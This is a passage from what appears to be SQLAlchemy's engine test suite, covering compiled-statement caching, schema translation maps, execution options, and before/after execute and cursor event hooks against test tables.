def test_connection_as_ctx(self):
fn = self._trans_fn()
with testing.db.begin() as conn:
fn(conn, 5, value=8)
self._assert_fn(5, value=8)
@testing.fails_on("mysql+oursql", "oursql bug ? getting wrong rowcount")
@testing.requires.legacy_engine
def test_connect_as_ctx_noautocommit(self):
fn = self._trans_fn()
self._assert_no_data()
with testing.db.connect() as conn:
ctx = conn.execution_options(autocommit=False)
testing.run_as_contextmanager(ctx, fn, 5, value=8)
# autocommit is off
self._assert_no_data()
class FutureConvenienceExecuteTest(
fixtures.FutureEngineMixin, ConvenienceExecuteTest
):
__backend__ = True
class CompiledCacheTest(fixtures.TestBase):
__backend__ = True
def test_cache(self, connection, metadata):
users = Table(
"users",
metadata,
Column(
"user_id", INT, primary_key=True, test_needs_autoincrement=True
),
Column("user_name", VARCHAR(20)),
Column("extra_data", VARCHAR(20)),
)
users.create(connection)
conn = connection
cache = {}
cached_conn = conn.execution_options(compiled_cache=cache)
ins = users.insert()
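# patch the construct's _compiler hook so we can count actual compilations;
# with compiled_cache in place, three executions should compile only once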
with patch.object(
ins, "_compiler", Mock(side_effect=ins._compiler)
) as compile_mock:
cached_conn.execute(ins, {"user_name": "u1"})
cached_conn.execute(ins, {"user_name": "u2"})
cached_conn.execute(ins, {"user_name": "u3"})
eq_(compile_mock.call_count, 1)
assert len(cache) == 1
eq_(conn.exec_driver_sql("select count(*) from users").scalar(), 3)
@testing.only_on(
["sqlite", "mysql", "postgresql"],
"uses blob value that is problematic for some DBAPIs",
)
def test_cache_noleak_on_statement_values(self, metadata, connection):
# This is a non-regression test for an object reference leak caused
# by the compiled_cache.
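# strategy: insert a weakref-able blob value, drop the strong reference,
# force garbage collection, and assert the weakref is cleared, proving the
# cache did not retain the statement's parameter values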
photo = Table(
"photo",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("photo_blob", LargeBinary()),
)
metadata.create_all(connection)
cache = {}
cached_conn = connection.execution_options(compiled_cache=cache)
class PhotoBlob(bytearray):
pass
blob = PhotoBlob(100)
ref_blob = weakref.ref(blob)
ins = photo.insert()
with patch.object(
ins, "_compiler", Mock(side_effect=ins._compiler)
) as compile_mock:
cached_conn.execute(ins, {"photo_blob": blob})
eq_(compile_mock.call_count, 1)
eq_(len(cache), 1)
eq_(
connection.exec_driver_sql("select count(*) from photo").scalar(),
1,
)
del blob
gc_collect()
# The compiled statement cache should not hold any reference to
# the statement values (only the keys).
eq_(ref_blob(), None)
def test_keys_independent_of_ordering(self, connection, metadata):
users = Table(
"users",
metadata,
Column(
"user_id", INT, primary_key=True, test_needs_autoincrement=True
),
Column("user_name", VARCHAR(20)),
Column("extra_data", VARCHAR(20)),
)
users.create(connection)
connection.execute(
users.insert(),
{"user_id": 1, "user_name": "u1", "extra_data": "e1"},
)
cache = {}
cached_conn = connection.execution_options(compiled_cache=cache)
upd = users.update().where(users.c.user_id == bindparam("b_user_id"))
with patch.object(
upd, "_compiler", Mock(side_effect=upd._compiler)
) as compile_mock:
cached_conn.execute(
upd,
util.OrderedDict(
[
("b_user_id", 1),
("user_name", "u2"),
("extra_data", "e2"),
]
),
)
cached_conn.execute(
upd,
util.OrderedDict(
[
("b_user_id", 1),
("extra_data", "e3"),
("user_name", "u3"),
]
),
)
cached_conn.execute(
upd,
util.OrderedDict(
[
("extra_data", "e4"),
("user_name", "u4"),
("b_user_id", 1),
]
),
)
eq_(compile_mock.call_count, 1)
eq_(len(cache), 1)
@testing.requires.schemas
def test_schema_translate_in_key(self, metadata, connection):
Table("x", metadata, Column("q", Integer))
Table("x", metadata, Column("q", Integer), schema=config.test_schema)
metadata.create_all(connection)
m = MetaData()
t1 = Table("x", m, Column("q", Integer))
ins = t1.insert()
stmt = select(t1.c.q)
cache = {}
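# the same compiled cache is shared across connections that use different
# schema_translate_map settings; the map needs to be part of the cache key
# so each setting gets its own compiled statement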
conn = connection.execution_options(compiled_cache=cache)
conn.execute(ins, {"q": 1})
eq_(conn.scalar(stmt), 1)
conn = connection.execution_options(
compiled_cache=cache,
schema_translate_map={None: config.test_schema},
)
conn.execute(ins, {"q": 2})
eq_(conn.scalar(stmt), 2)
conn = connection.execution_options(
compiled_cache=cache,
schema_translate_map={None: None},
)
# should use default schema again even though statement
# was compiled with test_schema in the map
eq_(conn.scalar(stmt), 1)
conn = connection.execution_options(
compiled_cache=cache,
)
eq_(conn.scalar(stmt), 1)
class MockStrategyTest(fixtures.TestBase):
def _engine_fixture(self):
buf = util.StringIO()
def dump(sql, *multiparams, **params):
buf.write(util.text_type(sql.compile(dialect=engine.dialect)))
engine = create_mock_engine("postgresql://", executor=dump)
return engine, buf
def test_sequence_not_duped(self):
engine, buf = self._engine_fixture()
metadata = MetaData()
t = Table(
"testtable",
metadata,
Column(
"pk",
Integer,
Sequence("testtable_pk_seq"),
primary_key=True,
),
)
t.create(engine)
t.drop(engine)
eq_(re.findall(r"CREATE (\w+)", buf.getvalue()), ["SEQUENCE", "TABLE"])
eq_(re.findall(r"DROP (\w+)", buf.getvalue()), ["TABLE", "SEQUENCE"])
class SchemaTranslateTest(fixtures.TestBase, testing.AssertsExecutionResults):
__requires__ = ("schemas",)
__backend__ = True
@testing.fixture
def plain_tables(self, metadata):
t1 = Table(
"t1", metadata, Column("x", Integer), schema=config.test_schema
)
t2 = Table(
"t2", metadata, Column("x", Integer), schema=config.test_schema
)
t3 = Table("t3", metadata, Column("x", Integer), schema=None)
return t1, t2, t3
def test_create_table(self, plain_tables, connection):
map_ = {
None: config.test_schema,
"foo": config.test_schema,
"bar": None,
}
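# the default (None) schema and "foo" both translate to the test schema,
# while "bar" translates back to the default schema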
metadata = MetaData()
t1 = Table("t1", metadata, Column("x", Integer))
t2 = Table("t2", metadata, Column("x", Integer), schema="foo")
t3 = Table("t3", metadata, Column("x", Integer), schema="bar")
with self.sql_execution_asserter(connection) as asserter:
conn = connection.execution_options(schema_translate_map=map_)
t1.create(conn)
t2.create(conn)
t3.create(conn)
t3.drop(conn)
t2.drop(conn)
t1.drop(conn)
asserter.assert_(
CompiledSQL("CREATE TABLE __[SCHEMA__none].t1 (x INTEGER)"),
CompiledSQL("CREATE TABLE __[SCHEMA_foo].t2 (x INTEGER)"),
CompiledSQL("CREATE TABLE __[SCHEMA_bar].t3 (x INTEGER)"),
CompiledSQL("DROP TABLE __[SCHEMA_bar].t3"),
CompiledSQL("DROP TABLE __[SCHEMA_foo].t2"),
CompiledSQL("DROP TABLE __[SCHEMA__none].t1"),
)
def test_ddl_hastable(self, plain_tables, connection):
map_ = {
None: config.test_schema,
"foo": config.test_schema,
"bar": None,
}
metadata = MetaData()
Table("t1", metadata, Column("x", Integer))
Table("t2", metadata, Column("x", Integer), schema="foo")
Table("t3", metadata, Column("x", Integer), schema="bar")
conn = connection.execution_options(schema_translate_map=map_)
metadata.create_all(conn)
insp = inspect(connection)
is_true(insp.has_table("t1", schema=config.test_schema))
is_true(insp.has_table("t2", schema=config.test_schema))
is_true(insp.has_table("t3", schema=None))
conn = connection.execution_options(schema_translate_map=map_)
# if this test fails, the tables won't get dropped, so we need a
# more robust fixture for this
metadata.drop_all(conn)
insp = inspect(connection)
is_false(insp.has_table("t1", schema=config.test_schema))
is_false(insp.has_table("t2", schema=config.test_schema))
is_false(insp.has_table("t3", schema=None))
def test_option_on_execute(self, plain_tables, connection):
# self.metadata is supplied by the metadata fixture, pulled in via the
# plain_tables fixture
self.metadata.create_all(connection)
map_ = {
None: config.test_schema,
"foo": config.test_schema,
"bar": None,
}
metadata = MetaData()
t1 = Table("t1", metadata, Column("x", Integer))
t2 = Table("t2", metadata, Column("x", Integer), schema="foo")
t3 = Table("t3", metadata, Column("x", Integer), schema="bar")
with self.sql_execution_asserter(connection) as asserter:
conn = connection
execution_options = {"schema_translate_map": map_}
conn._execute_20(
t1.insert(), {"x": 1}, execution_options=execution_options
)
conn._execute_20(
t2.insert(), {"x": 1}, execution_options=execution_options
)
conn._execute_20(
t3.insert(), {"x": 1}, execution_options=execution_options
)
conn._execute_20(
t1.update().values(x=1).where(t1.c.x == 1),
execution_options=execution_options,
)
conn._execute_20(
t2.update().values(x=2).where(t2.c.x == 1),
execution_options=execution_options,
)
conn._execute_20(
t3.update().values(x=3).where(t3.c.x == 1),
execution_options=execution_options,
)
eq_(
conn._execute_20(
select(t1.c.x), execution_options=execution_options
).scalar(),
1,
)
eq_(
conn._execute_20(
select(t2.c.x), execution_options=execution_options
).scalar(),
2,
)
eq_(
conn._execute_20(
select(t3.c.x), execution_options=execution_options
).scalar(),
3,
)
conn._execute_20(t1.delete(), execution_options=execution_options)
conn._execute_20(t2.delete(), execution_options=execution_options)
conn._execute_20(t3.delete(), execution_options=execution_options)
asserter.assert_(
CompiledSQL("INSERT INTO __[SCHEMA__none].t1 (x) VALUES (:x)"),
CompiledSQL("INSERT INTO __[SCHEMA_foo].t2 (x) VALUES (:x)"),
CompiledSQL("INSERT INTO __[SCHEMA_bar].t3 (x) VALUES (:x)"),
CompiledSQL(
"UPDATE __[SCHEMA__none].t1 SET x=:x WHERE "
"__[SCHEMA__none].t1.x = :x_1"
),
CompiledSQL(
"UPDATE __[SCHEMA_foo].t2 SET x=:x WHERE "
"__[SCHEMA_foo].t2.x = :x_1"
),
CompiledSQL(
"UPDATE __[SCHEMA_bar].t3 SET x=:x WHERE "
"__[SCHEMA_bar].t3.x = :x_1"
),
CompiledSQL(
"SELECT __[SCHEMA__none].t1.x FROM __[SCHEMA__none].t1"
),
CompiledSQL("SELECT __[SCHEMA_foo].t2.x FROM __[SCHEMA_foo].t2"),
CompiledSQL("SELECT __[SCHEMA_bar].t3.x FROM __[SCHEMA_bar].t3"),
CompiledSQL("DELETE FROM __[SCHEMA__none].t1"),
CompiledSQL("DELETE FROM __[SCHEMA_foo].t2"),
CompiledSQL("DELETE FROM __[SCHEMA_bar].t3"),
)
def test_crud(self, plain_tables, connection):
# self.metadata is supplied by the metadata fixture, pulled in via the
# plain_tables fixture
self.metadata.create_all(connection)
map_ = {
None: config.test_schema,
"foo": config.test_schema,
"bar": None,
}
metadata = MetaData()
t1 = Table("t1", metadata, Column("x", Integer))
t2 = Table("t2", metadata, Column("x", Integer), schema="foo")
t3 = Table("t3", metadata, Column("x", Integer), schema="bar")
with self.sql_execution_asserter(connection) as asserter:
conn = connection.execution_options(schema_translate_map=map_)
conn.execute(t1.insert(), {"x": 1})
conn.execute(t2.insert(), {"x": 1})
conn.execute(t3.insert(), {"x": 1})
conn.execute(t1.update().values(x=1).where(t1.c.x == 1))
conn.execute(t2.update().values(x=2).where(t2.c.x == 1))
conn.execute(t3.update().values(x=3).where(t3.c.x == 1))
eq_(conn.scalar(select(t1.c.x)), 1)
eq_(conn.scalar(select(t2.c.x)), 2)
eq_(conn.scalar(select(t3.c.x)), 3)
conn.execute(t1.delete())
conn.execute(t2.delete())
conn.execute(t3.delete())
asserter.assert_(
CompiledSQL("INSERT INTO __[SCHEMA__none].t1 (x) VALUES (:x)"),
CompiledSQL("INSERT INTO __[SCHEMA_foo].t2 (x) VALUES (:x)"),
CompiledSQL("INSERT INTO __[SCHEMA_bar].t3 (x) VALUES (:x)"),
CompiledSQL(
"UPDATE __[SCHEMA__none].t1 SET x=:x WHERE "
"__[SCHEMA__none].t1.x = :x_1"
),
CompiledSQL(
"UPDATE __[SCHEMA_foo].t2 SET x=:x WHERE "
"__[SCHEMA_foo].t2.x = :x_1"
),
CompiledSQL(
"UPDATE __[SCHEMA_bar].t3 SET x=:x WHERE "
"__[SCHEMA_bar].t3.x = :x_1"
),
CompiledSQL(
"SELECT __[SCHEMA__none].t1.x FROM __[SCHEMA__none].t1"
),
CompiledSQL("SELECT __[SCHEMA_foo].t2.x FROM __[SCHEMA_foo].t2"),
CompiledSQL("SELECT __[SCHEMA_bar].t3.x FROM __[SCHEMA_bar].t3"),
CompiledSQL("DELETE FROM __[SCHEMA__none].t1"),
CompiledSQL("DELETE FROM __[SCHEMA_foo].t2"),
CompiledSQL("DELETE FROM __[SCHEMA_bar].t3"),
)
def test_via_engine(self, plain_tables, metadata):
with config.db.begin() as connection:
metadata.create_all(connection)
map_ = {
None: config.test_schema,
"foo": config.test_schema,
"bar": None,
}
metadata = MetaData()
t2 = Table("t2", metadata, Column("x", Integer), schema="foo")
with self.sql_execution_asserter(config.db) as asserter:
eng = config.db.execution_options(schema_translate_map=map_)
with eng.connect() as conn:
conn.execute(select(t2.c.x))
asserter.assert_(
CompiledSQL("SELECT __[SCHEMA_foo].t2.x FROM __[SCHEMA_foo].t2")
)
class ExecutionOptionsTest(fixtures.TestBase):
def test_dialect_conn_options(self, testing_engine):
engine = testing_engine("sqlite://", options=dict(_initialize=False))
engine.dialect = Mock()
with engine.connect() as conn:
c2 = conn.execution_options(foo="bar")
eq_(
engine.dialect.set_connection_execution_options.mock_calls,
[call(c2, {"foo": "bar"})],
)
def test_dialect_engine_options(self, testing_engine):
engine = testing_engine("sqlite://")
engine.dialect = Mock()
e2 = engine.execution_options(foo="bar")
eq_(
engine.dialect.set_engine_execution_options.mock_calls,
[call(e2, {"foo": "bar"})],
)
def test_dialect_engine_construction_options(self):
dialect = Mock()
engine = Engine(
Mock(), dialect, Mock(), execution_options={"foo": "bar"}
)
eq_(
dialect.set_engine_execution_options.mock_calls,
[call(engine, {"foo": "bar"})],
)
def test_propagate_engine_to_connection(self, testing_engine):
engine = testing_engine(
"sqlite://", options=dict(execution_options={"foo": "bar"})
)
with engine.connect() as conn:
eq_(conn._execution_options, {"foo": "bar"})
def test_propagate_option_engine_to_connection(self, testing_engine):
e1 = testing_engine(
"sqlite://", options=dict(execution_options={"foo": "bar"})
)
e2 = e1.execution_options(bat="hoho")
c1 = e1.connect()
c2 = e2.connect()
eq_(c1._execution_options, {"foo": "bar"})
eq_(c2._execution_options, {"foo": "bar", "bat": "hoho"})
c1.close()
c2.close()
def test_get_engine_execution_options(self, testing_engine):
engine = testing_engine("sqlite://")
engine.dialect = Mock()
e2 = engine.execution_options(foo="bar")
eq_(e2.get_execution_options(), {"foo": "bar"})
def test_get_connection_execution_options(self, testing_engine):
engine = testing_engine("sqlite://", options=dict(_initialize=False))
engine.dialect = Mock()
with engine.connect() as conn:
c = conn.execution_options(foo="bar")
eq_(c.get_execution_options(), {"foo": "bar"})
class EngineEventsTest(fixtures.TestBase):
__requires__ = ("ad_hoc_engines",)
__backend__ = True
def teardown_test(self):
Engine.dispatch._clear()
Engine._has_events = False
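# helper: walk the received (statement, params, multiparams) events in
# order, requiring each expected statement prefix to appear with matching
# named or positional parameters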
def _assert_stmts(self, expected, received):
list(received)
for stmt, params, posn in expected:
if not received:
assert False, "Nothing available for stmt: %s" % stmt
while received:
teststmt, testparams, testmultiparams = received.pop(0)
teststmt = (
re.compile(r"[\n\t ]+", re.M).sub(" ", teststmt).strip()
)
if teststmt.startswith(stmt) and (
testparams == params or testparams == posn
):
break
def test_per_engine_independence(self, testing_engine):
e1 = testing_engine(config.db_url)
e2 = testing_engine(config.db_url)
canary = Mock()
event.listen(e1, "before_execute", canary)
s1 = select(1)
s2 = select(2)
with e1.connect() as conn:
conn.execute(s1)
with e2.connect() as conn:
conn.execute(s2)
eq_([arg[1][1] for arg in canary.mock_calls], [s1])
event.listen(e2, "before_execute", canary)
with e1.connect() as conn:
conn.execute(s1)
with e2.connect() as conn:
conn.execute(s2)
eq_([arg[1][1] for arg in canary.mock_calls], [s1, s1, s2])
def test_per_engine_plus_global(self, testing_engine):
canary = Mock()
event.listen(Engine, "before_execute", canary.be1)
e1 = testing_engine(config.db_url)
e2 = testing_engine(config.db_url)
event.listen(e1, "before_execute", canary.be2)
event.listen(Engine, "before_execute", canary.be3)
with e1.connect() as conn:
conn.execute(select(1))
eq_(canary.be1.call_count, 1)
eq_(canary.be2.call_count, 1)
with e2.connect() as conn:
conn.execute(select(1))
eq_(canary.be1.call_count, 2)
eq_(canary.be2.call_count, 1)
eq_(canary.be3.call_count, 2)
def test_emit_sql_in_autobegin(self, testing_engine):
e1 = testing_engine(config.db_url)
canary = Mock()
@event.listens_for(e1, "begin")
def begin(connection):
result = connection.execute(select(1)).scalar()
canary.got_result(result)
with e1.connect() as conn:
assert not conn._is_future
with conn.begin():
conn.execute(select(1)).scalar()
assert conn.in_transaction()
assert not conn.in_transaction()
eq_(canary.mock_calls, [call.got_result(1)])
def test_per_connection_plus_engine(self, testing_engine):
canary = Mock()
e1 = testing_engine(config.db_url)
event.listen(e1, "before_execute", canary.be1)
conn = e1.connect()
event.listen(conn, "before_execute", canary.be2)
conn.execute(select(1))
eq_(canary.be1.call_count, 1)
eq_(canary.be2.call_count, 1)
if testing.requires.legacy_engine.enabled:
conn._branch().execute(select(1))
eq_(canary.be1.call_count, 2)
eq_(canary.be2.call_count, 2)
@testing.combinations(
(True, False),
(True, True),
(False, False),
argnames="mock_out_on_connect, add_our_own_onconnect",
)
def test_insert_connect_is_definitely_first(
self, mock_out_on_connect, add_our_own_onconnect, testing_engine
):
"""test issue #5708.
We want to ensure that a single "connect" event may be invoked
*before* dialect initialize as well as before dialect on_connects.
This is also partially reliant on the changes we made as a result of
#5497, however here we go further with the changes and remove use
of the pool first_connect() event entirely so that the startup
for a dialect is fully consistent.
"""
if mock_out_on_connect:
if add_our_own_onconnect:
def our_connect(connection):
m1.our_connect("our connect event")
patcher = mock.patch.object(
config.db.dialect.__class__,
"on_connect",
lambda self: our_connect,
)
else:
patcher = mock.patch.object(
config.db.dialect.__class__,
"on_connect",
lambda self: None,
)
else:
patcher = util.nullcontext()
with patcher:
e1 = testing_engine(config.db_url)
initialize = e1.dialect.initialize
def init(connection):
initialize(connection)
with mock.patch.object(
e1.dialect, "initialize", side_effect=init
) as m1:
@event.listens_for(e1, "connect", insert=True)
def go1(dbapi_conn, xyz):
m1.foo("custom event first")
@event.listens_for(e1, "connect")
def go2(dbapi_conn, xyz):
m1.foo("custom event last")
c1 = e1.connect()
m1.bar("ok next connection")
c2 = e1.connect()
# this happens with the sqlite SingletonThreadPool.
# we can almost use testing.requires.independent_connections,
# but the sqlite file backend will also have independent
# connections here.
its_the_same_connection = (
c1.connection.dbapi_connection
is c2.connection.dbapi_connection
)
c1.close()
c2.close()
if add_our_own_onconnect:
calls = [
mock.call.foo("custom event first"),
mock.call.our_connect("our connect event"),
mock.call(mock.ANY),
mock.call.foo("custom event last"),
mock.call.bar("ok next connection"),
]
else:
calls = [
mock.call.foo("custom event first"),
mock.call(mock.ANY),
mock.call.foo("custom event last"),
mock.call.bar("ok next connection"),
]
if not its_the_same_connection:
if add_our_own_onconnect:
calls.extend(
[
mock.call.foo("custom event first"),
mock.call.our_connect("our connect event"),
mock.call.foo("custom event last"),
]
)
else:
calls.extend(
[
mock.call.foo("custom event first"),
mock.call.foo("custom event last"),
]
)
eq_(m1.mock_calls, calls)
def test_new_exec_driver_sql_no_events(self):
m1 = Mock()
def select1(db):
return str(select(1).compile(dialect=db.dialect))
with testing.db.connect() as conn:
event.listen(conn, "before_execute", m1.before_execute)
event.listen(conn, "after_execute", m1.after_execute)
conn.exec_driver_sql(select1(testing.db))
eq_(m1.mock_calls, [])
def test_add_event_after_connect(self, testing_engine):
# new feature as of #2978
canary = Mock()
e1 = testing_engine(config.db_url, future=False)
assert not e1._has_events
conn = e1.connect()
event.listen(e1, "before_execute", canary.be1)
conn.execute(select(1))
eq_(canary.be1.call_count, 1)
conn._branch().execute(select(1))
eq_(canary.be1.call_count, 2)
def test_force_conn_events_false(self, testing_engine):
canary = Mock()
e1 = testing_engine(config.db_url, future=False)
assert not e1._has_events
event.listen(e1, "before_execute", canary.be1)
conn = e1._connection_cls(
e1, connection=e1.raw_connection(), _has_events=False
)
conn.execute(select(1))
eq_(canary.be1.call_count, 0)
conn._branch().execute(select(1))
eq_(canary.be1.call_count, 0)
def test_cursor_events_ctx_execute_scalar(self, testing_engine):
canary = Mock()
e1 = testing_engine(config.db_url)
event.listen(e1, "before_cursor_execute", canary.bce)
event.listen(e1, "after_cursor_execute", canary.ace)
stmt = str(select(1).compile(dialect=e1.dialect))
with e1.connect() as conn:
dialect = conn.dialect
ctx = dialect.execution_ctx_cls._init_statement(
dialect, conn, conn.connection, {}, stmt, {}
)
ctx._execute_scalar(stmt, Integer())
eq_(
canary.bce.mock_calls,
[call(conn, ctx.cursor, stmt, ctx.parameters[0], ctx, False)],
)
eq_(
canary.ace.mock_calls,
[call(conn, ctx.cursor, stmt, ctx.parameters[0], ctx, False)],
)
def test_cursor_events_execute(self, testing_engine):
canary = Mock()
e1 = testing_engine(config.db_url)
event.listen(e1, "before_cursor_execute", canary.bce)
event.listen(e1, "after_cursor_execute", canary.ace)
stmt = str(select(1).compile(dialect=e1.dialect))
with e1.connect() as conn:
result = conn.exec_driver_sql(stmt)
eq_(result.scalar(), 1)
ctx = result.context
eq_(
canary.bce.mock_calls,
[call(conn, ctx.cursor, stmt, ctx.parameters[0], ctx, False)],
)
eq_(
canary.ace.mock_calls,
[call(conn, ctx.cursor, stmt, ctx.parameters[0], ctx, False)],
)
@testing.combinations(
(
([{"x": 5, "y": 10}, {"x": 8, "y": 9}],),
{},
[{"x": 5, "y": 10}, {"x": 8, "y": 9}],
{},
),
(({"z": 10},), {}, [], {"z": 10}),
argnames="multiparams, params, expected_multiparams, expected_params",
)
def test_modify_parameters_from_event_one(
self,
multiparams,
params,
expected_multiparams,
expected_params,
testing_engine,
):
# this is testing both the normalization added to parameters
# as of I97cb4d06adfcc6b889f10d01cc7775925cffb116 and the fact
# that the return value from the event is taken as the new set
# of parameters.
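# before_execute is registered with retval=True below, so the tuple it
# returns replaces the original clauseelement/multiparams/params for the
# actual execution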
def before_execute(
conn, clauseelement, multiparams, params, execution_options
):
eq_(multiparams, expected_multiparams)
eq_(params, expected_params)
return clauseelement, (), {"q": "15"}
def after_execute(
conn, clauseelement, multiparams, params, result, execution_options
):
eq_(multiparams, ())
eq_(params, {"q": "15"})
e1 = testing_engine(config.db_url)
event.listen(e1, "before_execute", before_execute, retval=True)
event.listen(e1, "after_execute", after_execute)
with e1.connect() as conn:
result = conn.execute(
select(bindparam("q", type_=String)), *multiparams, **params
)
eq_(result.all(), [("15",)])
@testing.provide_metadata
def test_modify_parameters_from_event_two(self, connection):
t = Table("t", self.metadata, Column("q", Integer))
t.create(connection)
def before_execute(
conn, clauseelement, multiparams, params, execution_options
):
return clauseelement, [{"q": 15}, {"q": 19}], {}
event.listen(connection, "before_execute", before_execute, retval=True)
connection.execute(t.insert(), {"q": 12})
event.remove(connection, "before_execute", before_execute)
eq_(
connection.execute(select(t).order_by(t.c.q)).fetchall(),
[(15,), (19,)],
)
def test_modify_parameters_from_event_three(
self, connection, testing_engine
):
def before_execute(
conn, clauseelement, multiparams, params, execution_options
):
return clauseelement, [{"q": 15}, {"q": 19}], {"q": 7}
e1 = testing_engine(config.db_url)
event.listen(e1, "before_execute", before_execute, retval=True)
with expect_raises_message(
tsa.exc.InvalidRequestError,
"Event handler can't return non-empty multiparams "
"and params at the same time",
):
with e1.connect() as conn:
conn.execute(select(literal("1")))
@testing.only_on("sqlite")
def test_dont_modify_statement_driversql(self, connection):
m1 = mock.Mock()
@event.listens_for(connection, "before_execute", retval=True)
def _modify(
conn, clauseelement, multiparams, params, execution_options
):
m1.run_event()
return clauseelement.replace("hi", "there"), multiparams, params
# the event does not take effect for the "driver SQL" option
eq_(connection.exec_driver_sql("select 'hi'").scalar(), "hi")
# event is not called at all
eq_(m1.mock_calls, [])
@testing.combinations((True,), (False,), argnames="future")
@testing.only_on("sqlite")
def test_modify_statement_internal_driversql(self, connection, future):
m1 = mock.Mock()
@event.listens_for(connection, "before_execute", retval=True)
def _modify(
conn, clauseelement, multiparams, params, execution_options
):
m1.run_event()
return clauseelement.replace("hi", "there"), multiparams, params
eq_(
connection._exec_driver_sql(
"select 'hi'", [], {}, {}, future=future
).scalar(),
"hi" if future else "there",
)
if future:
eq_(m1.mock_calls, [])
else:
eq_(m1.mock_calls, [call.run_event()])
def test_modify_statement_clauseelement(self, connection):
@event.listens_for(connection, "before_execute", retval=True)
def _modify(
conn, clauseelement, multiparams, params, execution_options
):
return select(literal_column("'there'")), multiparams, params
eq_(connection.scalar(select(literal_column("'hi'"))), "there")
def test_argument_format_execute(self, testing_engine):
def before_execute(
conn, clauseelement, multiparams, params, execution_options
):
assert isinstance(multiparams, (list, tuple))
assert isinstance(params, collections_abc.Mapping)
def after_execute(
conn, clauseelement, multiparams, params, result, execution_options
):
assert isinstance(multiparams, (list, tuple))
assert isinstance(params, collections_abc.Mapping)
e1 = testing_engine(config.db_url)
event.listen(e1, "before_execute", before_execute)
event.listen(e1, "after_execute", after_execute)
with e1.connect() as conn:
conn.execute(select(1))
conn.execute(select(1).compile(dialect=e1.dialect).statement)
conn.execute(select(1).compile(dialect=e1.dialect))
conn._execute_compiled(
select(1).compile(dialect=e1.dialect), (), {}, {}
)
def test_execute_events(self):
stmts = []
cursor_stmts = []
def execute(
conn, clauseelement, multiparams, params, execution_options
):
stmts.append((str(clauseelement), params, multiparams))
def cursor_execute(
conn, cursor, statement, parameters, context, executemany
):
cursor_stmts.append((str(statement), parameters, None))
# TODO: this test is kind of a mess
for engine in [
engines.testing_engine(options=dict(implicit_returning=False)),
engines.testing_engine(
options=dict(implicit_returning=False)
).connect(),
]:
event.listen(engine, "before_execute", execute)
event.listen(engine, "before_cursor_execute", cursor_execute)
m = MetaData()
t1 = Table(
"t1",
m,
Column("c1", Integer, primary_key=True),
Column(
"c2",
String(50),
default=func.lower("Foo"),
primary_key=True,
),
)
if isinstance(engine, Connection):
ctx = None
conn = engine
else:
ctx = conn = engine.connect()
trans = conn.begin()
try:
m.create_all(conn, checkfirst=False)
try:
conn.execute(t1.insert(), dict(c1=5, c2="some data"))
conn.execute(t1.insert(), dict(c1=6))
eq_(
conn.execute(text("select * from t1")).fetchall(),
[(5, "some data"), (6, "foo")],
)
finally:
m.drop_all(conn)
trans.commit()
finally:
if ctx:
ctx.close()
compiled = [
("CREATE TABLE t1", {}, None),
(
"INSERT INTO t1 (c1, c2)",
{"c2": "some data", "c1": 5},
(),
),
("INSERT INTO t1 (c1, c2)", {"c1": 6}, ()),
("select * from t1", {}, None),
("DROP TABLE t1", {}, None),
]
cursor = [
("CREATE TABLE t1", {}, ()),
(
"INSERT INTO t1 (c1, c2)",
{"c2": "some data", "c1": 5},
(5, "some data"),
),
("SELECT lower", {"lower_2": "Foo"}, ("Foo",)),
(
"INSERT INTO t1 (c1, c2)",
{"c2": "foo", "c1": 6},
(6, "foo"),
),
("select * from t1", {}, ()),
("DROP TABLE t1", {}, ()),
]
self._assert_stmts(compiled, stmts)
self._assert_stmts(cursor, cursor_stmts)
def test_options(self):
canary = []
def execute(conn, *args, **kw):
canary.append("execute")
def cursor_execute(conn, *args, **kw):
canary.append("cursor_execute")
engine = engines.testing_engine()
event.listen(engine, "before_execute", execute)
event.listen(engine, "before_cursor_execute", cursor_execute)
conn = engine.connect()
c2 = conn.execution_options(foo="bar")
eq_(c2._execution_options, {"foo": "bar"})
c2.execute(select(1))
c3 = c2.execution_options(bar="bat")
eq_(c3._execution_options, {"foo": "bar", "bar": "bat"})
eq_(canary, ["execute", "cursor_execute"])
@testing.requires.ad_hoc_engines
def test_generative_engine_event_dispatch(self):
canary = []
def l1(*arg, **kw):
canary.append("l1")
def l2(*arg, **kw):
canary.append("l2")
def l3(*arg, **kw):
canary.append("l3")
eng = engines.testing_engine(
options={"execution_options": {"base": "x1"}}
)
event.listen(eng, "before_execute", l1)
eng1 = eng.execution_options(foo="b1")
event.listen(eng, "before_execute", l2)
event.listen(eng1, "before_execute", l3)
with eng.connect() as conn:
conn.execute(select(1))
eq_(canary, ["l1", "l2"])
with eng1.connect() as conn:
conn.execute(select(1))
eq_(canary, ["l1", "l2", "l3", "l1", "l2"])
@testing.requires.ad_hoc_engines
def test_clslevel_engine_event_options(self):
canary = []
def l1(*arg, **kw):
canary.append("l1")
def l2(*arg, **kw):
canary.append("l2")
def l3(*arg, **kw):
canary.append("l3")
def l4(*arg, **kw):
canary.append("l4")
event.listen(Engine, "before_execute", l1)
eng = engines.testing_engine(
options={"execution_options": {"base": "x1"}}
)
event.listen(eng, "before_execute", l2)
eng1 = eng.execution_options(foo="b1")
event.listen(eng, "before_execute", l3)
event.listen(eng1, "before_execute", l4)
with eng.connect() as conn:
conn.execute(select(1))
eq_(canary, ["l1", "l2", "l3"])
with eng1.connect() as conn:
conn.execute(select(1))
eq_(canary, ["l1", "l2", "l3", "l4", "l1", "l2", "l3"])
canary[:] = []
event.remove(Engine, "before_execute", l1)
event.remove(eng1, "before_execute", l4)
event.remove(eng, "before_execute", l3)
with eng1.connect() as conn:
conn.execute(select(1))
eq_(canary, ["l2"])
@testing.requires.ad_hoc_engines
def test_cant_listen_to_option_engine(self):
from sqlalchemy.engine import base
def evt(*arg, **kw):
pass
assert_raises_message(
tsa.exc.InvalidRequestError,
r"Can't assign an event directly to the "
"<class 'sqlalchemy.engine.base.OptionEngine'> class",
event.listen,
base.OptionEngine,
"before_cursor_execute",
evt,
)
@testing.requires.ad_hoc_engines
def test_dispose_event(self, testing_engine):
canary = Mock()
eng = testing_engine(testing.db.url)
event.listen(eng, "engine_disposed", canary)
conn = eng.connect()
conn.close()
eng.dispose()
conn = eng.connect()
conn.close()
eq_(canary.mock_calls, [call(eng)])
eng.dispose()
eq_(canary.mock_calls, [call(eng), call(eng)])
def test_retval_flag(self):
canary = []
def tracker(name):
def go(conn, *args, **kw):
canary.append(name)
return go
def execute(
conn, clauseelement, multiparams, params, execution_options
):
canary.append("execute")
return clauseelement, multiparams, params
def cursor_execute(
conn, cursor, statement, parameters, context, executemany
):
canary.append("cursor_execute")
return statement, parameters
engine = engines.testing_engine()
